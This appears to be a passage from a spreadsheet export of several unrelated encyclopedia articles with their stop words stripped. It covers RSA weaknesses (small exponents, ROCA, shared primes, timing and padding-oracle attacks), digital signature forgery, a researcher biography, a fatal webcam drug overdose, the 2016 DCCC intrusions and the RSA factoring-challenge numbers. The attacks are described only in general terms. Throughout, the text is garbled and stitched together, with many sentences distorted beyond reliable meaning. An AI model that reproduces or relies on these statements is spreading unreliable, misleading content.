3×1077), solving trivial. furthermore, either small prime factors, factored quickly pollard's algorithm, hence values discarded. important private exponent large enough. michael wiener showed (which quite typical) n1/4/3, computed efficiently e.there known attack small public exponents provided proper padding used. coppersmith's attack many applications attacking specifically public exponent small encrypted message short padded. 65537 commonly used value value regarded compromise avoiding potential small-exponent attacks still allowing efficient encryptions signature verification). nist special publication computer security 800-78 rev. august 2007) allow public exponents smaller 65537, state reason restriction. october 2017, team researchers masaryk university announced roca vulnerability, affects keys generated algorithm embodied library infineon known rsalib. large number smart cards trusted platform modules (tpm) shown affected. vulnerable keys easily identified using test program team released. importance strong random number generation cryptographically strong random number generator, properly seeded adequate entropy, must used generate primes analysis comparing millions public keys gathered internet carried early 2012 arjen lenstra, james hughes, maxime augier, joppe bos, thorsten kleinjung christophe wachter. they able factor 0.2% keys using euclid's algorithm.they exploited weakness unique cryptosystems based integer factorization. public key, p′q′ another, chance (but equal q′), simple computation gcd(n, factors totally compromising keys. lenstra note problem minimized using strong random seed length twice intended security level, employing deterministic function choose given instead choosing independently. nadia heninger part group similar experiment. they used idea daniel bernstein compute product keys found 729-million-digit number), instead computing gcd(n, separately, thereby achieving significant speedup, since large division, problem normal size. heninger says blog keys occurred almost entirely embedded applications, including "firewalls, routers, devices, remote server administration devices, printers, projectors, voip phones" manufacturers. heninger explains one-shared-prime problem uncovered groups results situations pseudorandom number generator poorly seeded initially, reseeded generation first second primes. using seeds sufficiently high entropy obtained stroke timings electronic diode noise atmospheric noise radio receiver tuned stations solve problem.strong random number generation important throughout every phase public-key cryptography. instance, weak generator used symmetric keys distributed rsa, eavesdropper could bypass guess symmetric keys directly. timing attacks kocher described attack 1995: attacker knows alice's hardware sufficient detail able measure decryption times several known ciphertexts, deduce decryption quickly. this attack also applied signature scheme. 2003, boneh brumley demonstrated practical attack capable recovering factorizations network connection (e.g., secure sockets layer (ssl)-enabled webserver). this attack takes advantage information leaked chinese remainder theorem optimization used many implementations. thwart attacks ensure decryption operation takes constant amount time every ciphertext. however, approach significantly reduce performance. instead, implementations alternate technique known cryptographic blinding. blinding makes multiplicative property rsa. instead computing (mod alice first chooses secret random value computes (rec)d (mod result computation, applying euler's theorem, (mod effect removed multiplying inverse. value chosen ciphertext. with blinding applied, decryption time longer correlated value input ciphertext, timing attack fails. adaptive chosen-ciphertext attacks 1998, daniel bleichenbacher described first practical adaptive chosen-ciphertext attack rsa-encrypted messages using pkcs padding scheme padding scheme randomizes adds structure rsa-encrypted message, possible determine whether decrypted message valid). flaws pkcs scheme, bleichenbacher able mount practical attack implementations secure sockets layer protocol recover session keys. result work, cryptographers recommend provably secure padding schemes optimal asymmetric encryption padding, laboratories released versions pkcs vulnerable attacks. variant attack, dubbed "berserk", came back 2014. impacted mozilla crypto library, used notably firefox chrome. side-channel analysis attacks side-channel attack using branch-prediction analysis (bpa) described. many processors branch predictor determine whether conditional branch instruction flow program likely taken not. often processors also implement simultaneous multithreading (smt). branch-prediction analysis attacks process discover (statistically) private processed processors. simple branch prediction analysis (sbpa) claims improve non-statistical way. paper, power simple branch prediction analysis", authors sbpa (onur aciicmez cetin kaya koc) claim discovered bits iterations. power-fault attack implementations described 2010. author recovered varying power voltage outside limits; caused multiple power faults server. tricky implementation there many details keep mind order implement securely (strong prng, acceptable public exponent...) this makes implementation challenging, point book practical cryptography with suggests avoiding possible. implementations some cryptography libraries provide support include: botan bouncy castle cryptlib crypto++ libgcrypt nettle openssl wolfcrypt gnutls mbed libressl also acoustic cryptanalysis computational complexity theory cryptographic length diffie–hellman exchange exchange management elliptic-curve cryptography public-key cryptography trapdoor function references further reading menezes, alfred; oorschot, paul vanstone, scott (october 1996). handbook applied cryptography. press. isbn 978-0-8493-8523-0. cormen, thomas leiserson, charles rivest, ronald stein, clifford (2001). introduction algorithms (2nd ed.). press mcgraw-hill. 881–887. isbn 978-0-262-03293-3. external links original patent filed u.s. patent office rivest; ronald (belmont, ma), shamir; (cambridge, ma), adleman; leonard (arlington, ma), december 1977, u.s. patent 4,405,829. pkcs cryptography standard (rsa laboratories website) pkcs standard "provides recommendations implementation public-key cryptography based algorithm, covering following aspects: cryptographic primitives; encryption schemes; signature schemes appendix; asn.1 syntax representing keys identifying schemes". explanation using colored lamps youtube thorough walk prime number hide-and-seek: cipher works onur aciicmez, cetin kaya koc, jean-pierre seifert: power simple branch prediction analysis example implementation pkcs#1 padding (gpl source code) kocher's article timing attacks animated explanation mathematical background cryptool grime, james. "rsa encryption". numberphile. brady haran. used encryption real world</t>
  </si>
  <si>
    <t>Digital signature forgery</t>
  </si>
  <si>
    <t>cryptographic digital signature system, digital signature forgery ability create pair consisting message, {\displaystyle signature mac), {\displaystyle \sigma valid {\displaystyle created past legitimate signer. there different types forgery.to types, security definitions associated. signature scheme secure specific definition forgery associated type possible. types following definitions ordered lowest highest achieved security, words, powerful weakest attack. definitions form hierarchy, meaning attacker able mount specific attack execute attacks list. likewise, scheme reaches certain security goal also reaches prior ones. total break more general following attacks, also total break: adversary recover private information keys used signer, create possible signature message. universal forgery (universal unforgeability, uuf) universal forgery creation adversary) valid signature, {\displaystyle \sigma given message, {\displaystyle adversary capable universal forgery able sign messages chose selective forgery), messages chosen random, even specific messages provided opponent. selective forgery (selective unforgeability, suf) selective forgery creation message/signature pair {\displaystyle (m,\sigma adversary, {\displaystyle chosen attacker prior attack. {\displaystyle chosen interesting mathematical properties respect signature algorithm; however, selective forgery, {\displaystyle must fixed start attack. ability successfully conduct selective forgery attack implies ability successfully conduct existential forgery attack. existential forgery existential forgery (existential unforgeability, euf) creation adversary) least message/signature pair, {\displaystyle (m,\sigma {\displaystyle never signed legitimate signer. adversary choose {\displaystyle freely; {\displaystyle need particular meaning; message content irrelevant long pair, {\displaystyle (m,\sigma valid, adversary succeeded constructing existential forgery. thus, creating existential forgery easier selective forgery, attacker select message {\displaystyle forgery easily created, whereas case selective forgery, challenger signature “difficult” message. example existential forgery cryptosystem following multiplicative property: {\displaystyle \sigma (m_{1})\cdot \sigma (m_{2})=\sigma (m_{1}\cdot m_{2})} this property exploited creating message {\displaystyle m'=m_{1}\cdot m_{2}} signature {\displaystyle \sigma \left(m'\right)=\sigma (m_{1}\cdot m_{2})=\sigma (m_{1})\cdot \sigma (m_{2})} common defense attack hash messages signing them. weak existential forgery (strong existential unforgeability, strong unforgeability; seuf, suf) this notion stronger (more secure) variant existential forgery detailed above. weak existential forgery creation adversary) least message/signature pair, {\displaystyle \left(m,\sigma '\right)} given message different signature {\displaystyle (m,\sigma produced legitimate signer. strong existential forgery essentially weakest adversarial goal, therefore strongest schemes strongly existentially unforgeable. references</t>
  </si>
  <si>
    <t>Debbie Leung</t>
  </si>
  <si>
    <t>debbie leung university research chair institute quantum computing university waterloo, also affiliated department combinatorics optimization. works theoretical quantum information processing.leung's research areas include quantum cryptography, quantum communication, measurement-based quantum computation, fault-tolerant quantum computation error correction.leung earned bachelor science mathematics physics caltech 1995. received doctoral advisors yoshihisa yamamoto isaac chuang stanford. thesis, entitled "towards robust quantum computation", demonstrated surprising result approximate quantum error-correcting codes outperform exact counterparts.in 2002, leung tolman postdoctoral fellowship institute quantum information caltech croucher fellowship. 2005, 10-year tier canada research chair quantum communications. recent work focuses quantum channel capacities, quantum network coding, quantum information processing limited entanglement. references external links debbie leung publications indexed google scholar</t>
  </si>
  <si>
    <t>Death of Brandon Vedas</t>
  </si>
  <si>
    <t>brandon carl vedas (april 1981 january 2003), also known nickname ripper irc, american computer enthusiast, recreational drug user member shroomery.org community died multiple drug overdose discussing chat webcam. death debate responsibilities roles online communities life-threatening situations. overview video chat session began vedas logged channel announced grip drugs". vedas indicated webcam chatters welcome view "grip drugs" subsequent ingestion thereof. while substances illicit, apparently obtained legitimate prescriptions treatment various illnesses vedas said suffered. vedas began consuming psilocybe mushrooms, stored prescription medication bottle. chat session progressed, users channel, grphish, noted "that's klonopin" thought vedas consumed clonazepam. vedas continued showing webcam viewers would four bottles methadone would consume course session, and, noting channel, proceeded consume entire bottle (reportedly methadone). after brief respite, vedas consumed propranolol (inderal), vicodin tablets, temazepam, seem taken descriptions given channel. during process, vedas maintained "usual weekend behavior" consumed similar quantities substances previous occasions. told hardcore" last things vedas typed, phrase often quoted sarcastically internet message boards discussion sites. also social media suicide drug overdose suicide kevin whitrick references external links memorial site created brother incident (part wayback machine (archived june 2009) incident (part wayback machine (archived october 2003)</t>
  </si>
  <si>
    <t>Democratic Congressional Campaign Committee cyber attacks</t>
  </si>
  <si>
    <t>friday july 2016 democratic congressional campaign committee reported computer systems infiltrated. strongly believed intelligence sources infiltrator groups russian foreign intelligence groups breached democratic national committee's computer systems. these groups known fancy bear cozy bear "sofacy").crowdstrike assisted efforts deal dccc breach. there significant concern russian government attempting influence 2016 presidential campaign. russian cyber intrusions united states government private sector computer systems significantly increased u.s, imposed sanctions russia invasion crimea ukraine. president obama's preference publicize cyber attacks. also cold democratic national committee cyber attacks foreign electoral intervention russian espionage united states russian interference 2018 united states elections social media 2016 united states presidential election references</t>
  </si>
  <si>
    <t>RSA numbers</t>
  </si>
  <si>
    <t>mathematics, numbers large semiprimes (numbers exactly prime factors) part factoring challenge. challenge find prime factors number. created laboratories march 1991 encourage research computational number theory practical difficulty factoring large integers. challenge ended 2007.rsa laboratories (which acronym creators technique; rivest, shamir adleman) published number semiprimes decimal digits. cash prizes varying size, us$200,000 (and prizes $20,000 awarded), offered factorization them. smallest number factored days. most numbers still factored many expected remain unfactored many years come. february 2020, smallest listed numbers factored. while challenge officially ended 2007, people still attempting find factorizations. according laboratories, "now industry considerably advanced understanding cryptanalytic strength common symmetric-key public-key algorithms, challenges longer active." some smaller prizes awarded time. remaining prizes retracted. first numbers generated, rsa-100 rsa-500, labeled according number decimal digits. later, beginning rsa-576, binary digits counted instead. exception rsa-617, created change numbering scheme. numbers listed increasing order below. rsa-100 rsa-100 decimal digits (330 bits). factorization announced april 1991, arjen lenstra. reportedly, factorization took days using multiple-polynomial quadratic sieve algorithm maspar parallel computer.the value factorization rsa-100 follows: rsa-100 1522605027922533360535618378132637429718068114961380688657908494580122963258952897654000350692006139 rsa-100 37975227936943673922808872755445627854565536638199 40094690950920881030683735292761468389214899724061 takes four hours repeat factorization using program msieve 2200 athlon processor. number factorized minutes overclocked intel core2 quad q9300, using ggnfs msieve binaries running distributed version factmsieve perl script. rsa-110 rsa-110 decimal digits (364 bits), factored april 1992 arjen lenstra mark manasse approximately month. number factorized less four hours overclocked intel core2 quad q9300, using ggnfs msieve binaries running distributed version factmsieve perl script.the value factorization follows: rsa-110 35794234179725868774991807832568455403003778024228226193532908190484670252364677411513516111204504060317568667 rsa-110 6122421090493547576937037317561418841225758554253106999 5846418214406154678836553182979162384198610505601062333 rsa-120 rsa-120 decimal digits (397 bits), factored june 1993 thomas denny, bruce dodson, arjen lenstra, mark manasse. computation took three months actual computer time. value factorization follows: rsa-120 227010481295437363334259960947493668895875336466084780038173258247009162675779735389791151574049166747880487470296548479 rsa-120 327414555693498015751146303749141488063642403240171463406883 693342667110830181197325401899700641361965863127336680673013 rsa-129 rsa-129, decimal digits (426 bits), part 1991 factoring challenge, rather related martin gardner's mathematical games column august 1977 issue scientific american.rsa-129 factored april 1994 team derek atkins, michael graff, arjen lenstra paul leyland, using approximately 1600 computers around volunteers connected internet. us$100 token prize awarded security factorization, donated free software foundation. value factorization follows: rsa-129 114381625757888867669235779976146612010218296721242362562561842935706935245733897830597123563958705058989075147599290026879543541 rsa-129 3490529510847650949147849619903898133417764638493387843990820577 32769132993266709549961988190834461413177642967992942539798288533 factorization found using multiple polynomial quadratic sieve algorithm. factoring challenge included message encrypted rsa-129. when decrypted using factorization message revealed "the magic words squeamish ossifrage". rsa-130 rsa-130 decimal digits (430 bits), factored april 1996, team arjen lenstra composed cowie, marije elkenbracht-huizing, wojtek furmanski, peter montgomery, damian weber joerg zayer.the value factorization follows: rsa-130 1807082088687404805951656164405905566278102516769401349170127021450056662540244048387341127590812303371781887966563182013214880557 rsa-130 39685999459597454290161126162883786067576449112810064832555157243 45534498646735972188403686897274408864356301263205069600999044599 factorization found using number field sieve algorithm polynomial 5748302248738405200 9882261917482286102 13392499389128176685 16875252458877684989 3759900174855208738 46769930553931905995 root 12574411168418005980468 modulo rsa-130. rsa-140 rsa-140 decimal digits (463 bits), factored february 1999, team herman riele composed stefania cavallar, bruce dodson, arjen lenstra, paul leyland, walter lioen, peter montgomery, brian murphy paul zimmermann.the value factorization follows: rsa-140 21290246318258757547497882016271517497806703963277216278233383215381949984056495911366573853021918316783107387995317230889569230873441936471 rsa-140 3398717423028438554530123627613875835633986495969597423490929302771479 6264200187401285096151654948264442219302037178623509019111660653946049 factorization found using number field sieve algorithm estimated 2000 mips-years computing time. rsa-150 rsa-150 decimal digits (496 bits), withdrawn challenge security. rsa-150 eventually factored 75-digit primes aoki 2004 using general number field sieve (gnfs), years bigger numbers still part challenge solved. value factorization follows: rsa-150 155089812478348440509606754370011861770654545830995430655466945774312632703463465954363335027577729025391453996787414027003501631772186840890795964683 rsa-150 348009867102283695483970451047593424831012817350385456889559637548278410717 445647744903640741533241125787086176005442536297766153493419724532460296199 rsa-155 rsa-155 decimal digits (512 bits), factored august 1999, span months, team herman riele composed stefania cavallar, bruce dodson, arjen lenstra, walter lioen, peter montgomery, brian murphy, karen aardal, jeff gilchrist, gerard guillerm, paul leyland, joel marchand, françois morain, alec muffett, craig putnam, chris putnam paul zimmermann.the value factorization follows: rsa-155 10941738641570527421809707322040357612003732945449205990913842131476349984288934784717997257891267332497625752899781833797076537244027146743531593354333897 rsa-155 1026395928297411057720541965739916759007165678080380668033419335217907113077 1066034883801684548209272203600128786792079585759892915222706082371930628086 factorization found using general number field sieve algorithm estimated 8000 mips-years computing time. rsa-160 rsa-160 decimal digits (530 bits), factored april 2003, team university bonn german federal office information security (bsi). team contained franke, bahr, kleinjung, lochter, böhm.the value factorization follows: rsa-160 2152741102718889701896015201312825429257773588845675980170497676778133145218859135673011059773491059602497907111585214302079314665202840140619946994927570407753 rsa-160 4542789285848139407168619064973883165613714577846979325095998470925000415733 5359 4738809060383201619663383230378895197326892292104095794474135464881202849390 9367 factorization found using general number field sieve algorithm. rsa-170 rsa-170 decimal digits (563 bits) first factored december 2009, bonenberger krone fachhochschule braunschweig/wolfenbüttel. independent factorization completed danilov popovyan days later.the value factorization follows: rsa-170 26062623684139844921529879266674432197085925380486406416164785191859999628542069361450283931914514618683512198164805919882053057222974116478065095809832377336510711545759 rsa-170 3586420730428501486799804587268520423291459681059978161140231860633948450858 040593963 7267029064107019078863797763923946264136137803856996670313708936002281582249 587494493 factorization found using general number field sieve algorithm. rsa-576 rsa-576 decimal digits (576 bits), factored december 2003, franke kleinjung university bonn. cash prize $10,000 offered security successful factorization. value factorization follows: rsa-576 188198812920607963838697239461650439807163563379417382700763356422988859715234665485319060606504743045317388011303396716199692321205734031879550656996221305168759307650257059 rsa-576 3980750864240649373971255005503864911990643623425267084063851895759463889572 61768583317 4727721461074353025362230719730482246329146953020971164598521711305207112563 63590397527 factorization found using general number field sieve algorithm. rsa-180 rsa-180 decimal digits (596 bits), factored 2010, danilov popovyan moscow state university, russia. rsa-180 1911479277189866096892294666314546498129862462766673548641885036388072607034 3679905877620136513516127813425829612810920004670291298456875280033022177775 2773957404540495707851421041 rsa-180 4007800823297508779525813391041005725268293178158071765648821789984975727719 50624613470377 4769396887386118369955354773570708579399020760277882320319897758246062255957 73435668861833 factorization found using general number field sieve algorithm implementation running three intel core pcs. rsa-190 rsa-190 decimal digits (629 bits), factored november 2010, popovyan moscow state university, russia, timofeev cwi, netherlands. rsa-190 1907556405060696491061450432646028861081179759533184460647975622318915025587 1841757540549761551215932934922604641526300932385092466032074171247261215808 58185985938946945490481721756401423481 rsa-190 3171195257690152709485171289740475929805147316029450327784761927832793642798 1256542415724309619 6015260020444561641587641685526676183243543359471811072599763828083615704046 0481625355619404899 rsa-640 rsa-640 decimal digits (640 bits). cash prize us$20,000 offered security successful factorization. november 2005, bahr, boehm, franke kleinjung german federal office information security announced factorized number using gnfs follows: rsa-640 3107418240490043721350750035888567930037346022842727545720161948823206440518 0815045563468296717232867824379162728380334154710731085019195485290073377248 22783525742386454014691736602477652346609 rsa-640 1634733645809253848443133883865090859841783670033092312181110852389333100104 508151212118167511579 1900871281664822113126851573935413975471896789968515493666638539088027103802 104498957191261465571 computation took five months opteron cpus. slightly larger rsa-200 factored 2005 team. rsa-200 rsa-200 decimal digits (663 bits), factors 100-digit primes given below. 2005, bahr, boehm, franke, kleinjung announced factorized number using gnfs follows: rsa-200 2799783391122132787082946763872260162107044678695542853756000992932612840010 7609345671052955360856061822351910951365788637105954482006576775098580557613 579098734950144178863178946295187237869221823983 rsa-200 3532461934402770121272604978198464368671197400197625023649303468776121253679 423200058547956528088349 7925869954478333033347085841480059687737975857364219960734330341455767872818 152135381409304740185467 time spent finding factors collection parallel computers amounted approximately equivalent years work single opteron-based computer. note approximation serves suggest scale effort, leaves many complicating factors; announcement states precisely. rsa-210 rsa-210 decimal digits (696 bits) factored september 2013 ryan propper: rsa-210 2452466449002782119765176635730880184670267876783327597434144517150616008300 3858721695220839933207154910362682719167986407977672324300560059203563124656 1218465817904100131859299619933817012149335034875870551067 rsa-210 4359585683259407917999519653872144063854709102652201963187054821445240853452 75999740244625255428455944579 5625457617268841037562770073044474817438769440075105451049468510945483965774 79473472146228550799322939273 rsa-704 rsa-704 decimal digits (704 bits), factored bai, emmanuel thomé paul zimmermann. factorization announced july 2012. cash prize us$30,000 previously offered successful factorization. rsa-704 7403756347956171282804679609742957314259318888923128908493623263897276503402 8266276891996419625117843995894330502127585370118968098286733173273108930900 552505116877063299072396380786710086096962537934650563796359 rsa-704 9091213529597818878440658302600437485892608310328358720428512168960411528640 933367824950788367956756806141 8143859259110045265727809126284429335877899002167627883200914172429324360133 004116702003240828777970252499 rsa-220 rsa-220 decimal digits (729 bits), factored bai, gaudry, kruppa, thomé zimmermann. factorization announced 2016. rsa-220 2260138526203405784941654048610197513508038915719776718321197768109445641817 9666766085931213065825772506315628866769704480700018111497118630021124879281 99487482066070131066586646083327982803560379205391980139946496955261 rsa-220 6863656412267566274382371499288437800130842239979164844621244993321541061441 4642667938213644208420192054999687 3292907439486349812049301549212935291916455196536233952462686051169290349309 4652463337824866390738191765712603 rsa-230 rsa-230 decimal digits (762 bits), factored samuel gross august 2018. rsa-230 1796949159794106673291612844957324615636756180801260007088891883553172646034 1490933493372247868650755230855864199929221814436684722874052065257937495694 3483892631711525225256544109808191706117425097024407180103648316382885188526 rsa-230 4528450358010492026612439739120166758911246047493700040073956759261590397250 033699357694507193523000343088601688589 3968132623150957588532394439049887341769533966621957829426966084093049516953 598120833228447171744337427374763106901 rsa-232 rsa-232 decimal digits (768 bits), factored february 2020, zamarashkin, zheltkov matveev. rsa-232 1009881397871923546909564894309468582818233821955573955141120516205831021338 5285453743661097571543636649133800849170651699217015247332943892702802343809 6090980497644054071120196541074755382494867277137407501157718230539834060616 2079 rsa-232 2966909333208360660361779924242630634742946262521852394401857157419437019472 3262390744910112571804274494074452751891 3403816175197563438006609498491521420547121760734723172735163413276050706174 8526506443144325148088881115083863017669 rsa-768 rsa-768 decimal digits (768 bits), factored december 2009, span years, thorsten kleinjung, kazumaro aoki, jens franke, arjen lenstra, emmanuel thomé, pierrick gaudry, alexander kruppa, peter montgomery, joppe bos, arne osvik, herman riele, andrey timofeev, paul zimmermann. rsa-768 1230186684530117755130494958384962720772853569595334792197322452151726400507 2636575187452021997864693899564749427740638459251925573263034537315482685079 1702612214291346167042921431160222124047927473779408066535141959745985690214 3413 rsa-768 3347807169895689878604416984821269081770479498371376856891243138898288379387 8002287614711652531743087737814467999489 3674604366679959042824463379962795263227915816434308764267603228381573966651 1279233373417143396810270092798736308917 time spent finding factors collection parallel computers amounted approximately equivalent almost 2000 years computing single-core opteron-based computer. rsa-240 rsa-240 decimal digits (795 bits), factored november 2019 fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé paul zimmermann. rsa-240 1246203667817187840658350446081065904348203746516788057548187888832896668011 8821085503603957027250874750986476843845862105486553797025393057189121768431 8286362846948405301614416430468066875699415246993185704183030512549594371372 159029236099 rsa-240 5094359522858399145550510235808437141326483820241114731866602965218212064697 46700620316443478873837606252372049619334517 2446242088383181505678131390240028966538020925789314014520412213365584770951 78155258218897735030590669041302045908071447 time spent finding factors amounted approximately core-years intel xeon gold 6130 cpu. compared factorization rsa-768, authors estimate better algorithms sped calculations factor faster computers sped calculation factor 1.25–1.67. rsa-250 rsa-250 decimal digits (829 bits), factored february 2020 fabrice boudot, pierrick gaudry, aurore guillevic, nadia heninger, emmanuel thomé, paul zimmermann. announcement factorization occurred february rsa-250 2140324650240744961264423072839333563008614715144755017797754920881418023447 1401366433455190958046796109928518724709145876873962619215573630474547705208 0511905649310668769159001975940569345745223058932597669747168173806936489469 9871578494975937497937 rsa-250 6413528947707158027879019017057738908482501474294344720811685963202453234463 0238623598752668347708737661925585694639798853367 3337202759497815655622601060535511422794076034476755466678452098702384172921 0037080257448673296881877565718986258036932062711 factorisation rsa-250 utilised approximately 2700 core-years, using intel xeon gold 6130 reference. computation performed number field sieve algorithm, using open source cado-nfs software. team dedicated computation peter montgomery, american mathematician known contributions computational number theory cryptography died february 2020. rsa-260 rsa-260 decimal digits (862 bits), factored far. rsa-260 2211282552952966643528108525502623092761208950247001539441374831912882294140 2001986512729726569746599085900330031400051170742204560859276357953757185954 2988389587092292384910067030341246205457845664136645406842143612930176940208 46391065875914794251435144458199 rsa-270 rsa-270 decimal digits (895 bits), factored far. rsa-270 2331085303444075445276376569106805241456198124803054490429486119684959182451 3578286788836931857711641821391926857265831491306067262691135402760979316634 1626693946596196427744273886601876896313468704059066746903123910748277606548 649151920812699309766587514735456594993207 rsa-896 rsa-896 decimal digits (896 bits), factored far. cash prize $75,000 previously offered successful factorization. rsa-896 4120234369866595438555313653325759481798116998443279828454556264338764455652 4842619809887042316184187926142024718886949256093177637503342113098239748515 0944909106910269861031862704114880866970564902903653658867433731720813104105 190864254793282601391257624033946373269391 rsa-280 rsa-280 decimal digits (928 bits), factored far. rsa-280 1790707753365795418841729699379193276395981524363782327873718589639655966058 5783742549640396449103593468573113599487089842785784500698716853446786525536 5503525160280656363736307175332772875499505341538927978510751699922197178159 7724733184279534477239566789173532366357270583106789 rsa-290 rsa-290 decimal digits (962 bits), factored far. rsa-290 3050235186294003157769199519894966400298217959748768348671526618673316087694 3419156362946151249328917515864630224371171221716993844781534383325603218163 2549201100649908073932858897185243836002511996505765970769029474322210394327 60575157628357292075495937664206199565578681309135044121854119 rsa-300 rsa-300 decimal digits (995 bits), factored far. rsa-300 2769315567803442139028689061647233092237608363983953254005036722809375824714 9473946190060218756255124317186573105075074546238828817121274630072161346956 4396741836389979086904304472476001839015983033451909174663464663867829125664 459895575157178816900228792711267471958357574416714366499722090015674047 rsa-309 rsa-309 decimal digits (1,024 bits), factored far. rsa-309 1332943998825757583801437794588036586217112243226684602854588261917276276670 5425540467426933349195015527349334314071822840746357352800368666521274057591 1870128339157499072351179666739658503429931021985160714113146720277365006623 6927218079163559142755190653347914002967258537889160429597714204365647842739 10949 rsa-1024 rsa-1024 decimal digits (1,024 bits), factored far. $100,000 previously offered factorization. rsa-1024 135066410865995223349603216278805969938881475605667027524485143851526510604 859533833940287150571909441798207282164471551373680419703964191743046496589 274256239341020864383202110372958725762358509643110564073501508187510676594 629205563685529475213500852879416377328533906109750544334999811150056977236 890927563 rsa-310 rsa-310 decimal digits (1,028 bits), factored far. rsa-310 1848210397825850670380148517702559371400899745254512521925707445580334710601 4125276757082979328578439013881047668984294331264191394626965245834649837246 5163148188847336415136873623631778358751846501708714541673402642461569061162 0116380982484120857688483676576094865930188367141388795454378671343386258291 687641 rsa-320 rsa-320 decimal digits (1,061 bits), factored far. rsa-320 2136810696410071796012087414500377295863767938372793352315068620363196552357 8837094085435000951700943373838321997220564166302488321590128061531285010636 8571638978998117122840139210685346167726847173232244364004850978371121744321 8270343654835754061017503137136489303437996367224915212044704472299799616089 2591129924218437 rsa-330 rsa-330 decimal digits (1,094 bits), factored far. rsa-330 1218708633106058693138173980143325249157710686226055220408666600017481383238 1352456802425903555880722805261111079089882303717632638856140900933377863089 0634828167900405006112727432172179976427017137792606951424995281839383708354 6364684839261149319768449396541020909665209789862312609604983709923779304217 01862444655244698696759267 rsa-340 rsa-340 decimal digits (1,128 bits), factored far. rsa-340 2690987062294695111996484658008361875931308730357496490239672429933215694995 2758588771223263308836649715112756731997946779608413232406934433532048898585 9176676580752231563884394807622076177586625973975236127522811136600110415063 0004691128152106812042872285697735145105026966830649540003659922618399694276 990464815739966698956947129133275233 rsa-350 rsa-350 decimal digits (1,161 bits), factored far. rsa-350 2650719995173539473449812097373681101529786464211583162467454548229344585504 3495841191504413349124560193160478146528433707807716865391982823061751419151 6068496555750496764686447379170711424873128631468168019548127029171231892127 2886825928263239383444398948209649800021987837742009498347263667908976501360 3382322972552204068806061829535529820731640151 rsa-360 rsa-360 decimal digits (1,194 bits), factored far. rsa-360 2186820202343172631466406372285792654649158564828384065217121866374227745448 7764963889680817334211643637752157994969516984539482486678141304751672197524 0052350576247238785129338002757406892629970748212734663781952170745916609168 9358372359962787832802257421757011302526265184263565623426823456522539874717 61591019113926725623095606566457918240614767013806590649 rsa-370 rsa-370 decimal digits (1,227 bits), factored far. rsa-370 1888287707234383972842703127997127272470910519387718062380985523004987076701 7212819937261952549039800018961122586712624661442288502745681454363170484690 7379449525034797494321694352146271320296579623726631094822493455672541491544 2700993152879235272779266578292207161032746297546080025793864030543617862620 878802244305286292772467355603044265985905970622730682658082529621 rsa-380 rsa-380 decimal digits (1,261 bits), factored far. rsa-380 3013500443120211600356586024101276992492167997795839203528363236610578565791 8270750937407901898070219843622821090980641477056850056514799336625349678549 2187941807116344787358312651772858878058620717489800725333606564197363165358 2237779263423501952646847579678711825720733732734169866406145425286581665755 6977260763553328252421574633011335112031733393397168350585519524478541747311 rsa-390 rsa-390 decimal digits (1,294 bits), factored far. rsa-390 2680401941182388454501037079346656065366941749082852678729822424397709178250 4623002472848967604282562331676313645413672467684996118812899734451228212989 1630084759485063423604911639099585186833094019957687550377834977803400653628 6955344904367437281870253414058414063152368812498486005056223028285341898040 0795447435865033046248751475297412398697088084321037176392288312785544402209 1083492089 rsa-400 rsa-400 decimal digits (1,327 bits), factored far. rsa-400 2014096878945207511726700485783442547915321782072704356103039129009966793396 1419850865094551022604032086955587930913903404388675137661234189428453016032 6191193056768564862615321256630010268346471747836597131398943140685464051631 7519403149294308737302321684840956395183222117468443578509847947119995373645 3607109795994713287610750434646825511120586422993705980787028106033008907158 74500584758146849481 rsa-410 rsa-410 decimal digits (1,360 bits), factored far. rsa-410 1965360147993876141423945274178745707926269294439880746827971120992517421770 1079138139324539033381077755540830342989643633394137538983355218902490897764 4412968474332754608531823550599154905901691559098706892516477785203855688127 0635069372091564594333528156501293924133186705141485137856845741766150159437 6063244163040088180887087028771717321932252992567756075264441680858665410918 431223215368025334985424358839 rsa-420 rsa-420 decimal digits (1,393 bits), factored far. rsa-420 2091366302476510731652556423163330737009653626605245054798522959941292730258 1898373570076188752609749648953525484925466394800509169219344906273145413634 2427186266197097846022969248579454916155633686388106962365337549155747268356 4666583846809964354191550136023170105917441056517493690125545320242581503730 3405952887826925813912683942756431114820292313193705352716165790132673270514 3817744164107601735413785886836578207979 rsa-430 rsa-430 decimal digits (1,427 bits), factored far. rsa-430 3534635645620271361541209209607897224734887106182307093292005188843884213420 6950355315163258889704268733101305820000124678051064321160104990089741386777 2424190744453885127173046498565488221441242210687945185565975582458031351338 2070785777831859308900851761495284515874808406228585310317964648830289141496 3289966226854692560410075067278840383808716608668377947047236323168904650235 70092246473915442026549955865931709542468648109541 rsa-440 rsa-440 decimal digits (1,460 bits), factored far. rsa-440 2601428211955602590070788487371320550539810804595235289423508589663391270837 4310252674800592426746319007978890065337573160541942868114065643853327229484 5029942332226171123926606357523257736893667452341192247905168387893684524818 0307729497304959710847337973805145673263119916483529703607405432752966630781 2234597766390750441445314408171802070904072739275930410299359006059619305590 701939627725296116299946059898442103959412221518213407370491 rsa-450 rsa-450 decimal digits (1,493 bits), factored far. rsa-450 1984634237142836623497230721861131427789462869258862089878538009871598692569 0078791591684242367262529704652673686711493985446003494265587358393155378115 8032447061155145160770580926824366573211993981662614635734812647448360573856 3132247491715526997278115514905618953253443957435881503593414842367096046182 7643434794849824315251510662855699269624207451365738384255497823390996283918 3287667419172988072221996532403300258906083211160744508191024837057033 rsa-460 rsa-460 decimal digits (1,526 bits), factored far. rsa-460 1786856020404004433262103789212844585886400086993882955081051578507634807524 1464078819812169681394445771476334608488687746254318292828603396149562623036 3564554675355258128655971003201417831521222464468666642766044146641933788836 8932452217321354860484353296131403821175862890998598653858373835628654351880 4806362231643082386848731052350115776715521149453708868428108303016983133390 0416365515466857004900847501644808076825638918266848964153626486460448430073 4909 rsa-1536 rsa-1536 decimal digits (1,536 bits), factored far. $150,000 previously offered successful factorization. rsa-1536 184769970321174147430683562020016440301854933866341017147178577491065169671 116124985933768430543574458561606154457179405222971773252466096064694607124 962372044202226975675668737842756238950876467844093328515749657884341508847 552829818672645133986336493190808467199043187438128336350279547028265329780 293491615581188104984490831954500984839377522725705257859194499387007369575 568843693381277961308923039256969525326162082367649031603655137144791393234 7169566988069 rsa-470 rsa-470 decimal digits (1,559 bits), factored far. rsa-470 1705147378468118520908159923888702802518325585214915968358891836980967539803 6897711442383602526314519192366612270595815510311970886116763177669964411814 0957486602388713064698304619191359016382379244440741228665455229545368837485 5874455212895044521809620818878887632439504936237680657994105330538621759598 